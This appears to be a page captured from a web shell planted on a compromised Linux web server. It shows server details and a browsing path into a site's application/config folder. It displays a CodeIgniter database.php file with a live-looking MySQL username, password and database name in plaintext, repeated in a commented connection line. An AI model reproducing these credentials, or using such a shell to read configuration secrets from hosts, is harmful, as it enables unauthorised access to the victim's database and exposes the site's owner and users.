One Hat Cyber Team
Your IP :
172.69.130.198
Server IP :
188.114.96.4
Server :
Linux thuru 6.5.11-4-pve #1 SMP PREEMPT_DYNAMIC PMX 6.5.11-4 (2023-11-20T10:19Z) x86_64
Server Software :
Apache/2.4.51 (Unix) OpenSSL/1.0.2k-fips
PHP Version :
7.3.33
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
thuruk
/
public_html
/
application
/
config
/
View File Name :
database.php
<?php defined('BASEPATH') OR exit('No direct script access allowed'); $active_group = 'default'; $query_builder = TRUE; // $connect = mysqli_connect("localhost","thuruk_thuruus","n5zmEf1V1aiH","thuruk_thurudb"); $db['default'] = array( 'dsn' => '', 'hostname' => 'localhost', 'username' => 'thuruk_thuruus', 'password' => 'n5zmEf1V1aiH', 'database' => 'thuruk_thurudb', 'dbdriver' => 'mysqli', 'dbprefix' => '', 'pconnect' => FALSE, 'db_debug' => (ENVIRONMENT !== 'production'), 'cache_on' => FALSE, 'cachedir' => '', 'char_set' => 'utf8mb4', 'dbcollat' => 'utf8mb4_unicode_ci', 'swap_pre' => '', 'encrypt' => FALSE, 'compress' => FALSE, 'stricton' => FALSE, 'failover' => array(), 'save_queries' => TRUE, ); //$config['set_charset']=array( $db, 'utf8');